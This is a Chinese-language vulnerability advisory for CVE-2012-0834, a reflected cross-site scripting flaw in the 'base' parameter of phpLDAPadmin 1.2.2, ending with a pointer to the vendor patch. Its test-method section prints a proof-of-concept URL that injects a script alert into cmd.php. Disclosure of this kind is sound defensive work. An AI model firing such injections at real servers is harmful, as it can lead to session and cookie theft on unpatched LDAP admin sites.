phpLDAPadmin “base”参数跨站脚本执行漏洞


发布日期:2012-02-01
更新日期:2012-02-17

受影响系统:
phpLDAPadmin phpLDAPadmin 1.2.2
不受影响系统:
phpLDAPadmin phpLDAPadmin 2.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 51793
CVE ID: CVE-2012-0834

phpLDAPadmin是基于web的LDAP客户端,允许方便的管理LDAP服务器。

phpLDAPadmin在实现上存在跨站脚本执行漏洞,攻击者可利用此漏洞在受影响站点中执行任意脚本代码,窃取Cookie凭证。

<*来源:andsarmiento
 
  链接:http://www.securityfocus.com/archive/1/521450
*>

测试方法:
--------------------------------------------------------------------------------
警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/phpldapadmin/htdocs/cmd.php?cmd=query_engine&amp;server_id=1&amp;query=none&amp;format=list&amp;showresults=na&amp;base=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&amp;scope=sub&amp;
filter=objectClass%3D* display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&amp;orderby=&amp;size_limit=50&amp;search=Search

建议:
--------------------------------------------------------------------------------
厂商补丁:

phpLDAPadmin
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://phpldapadmin.sourceforge.net/

相关内容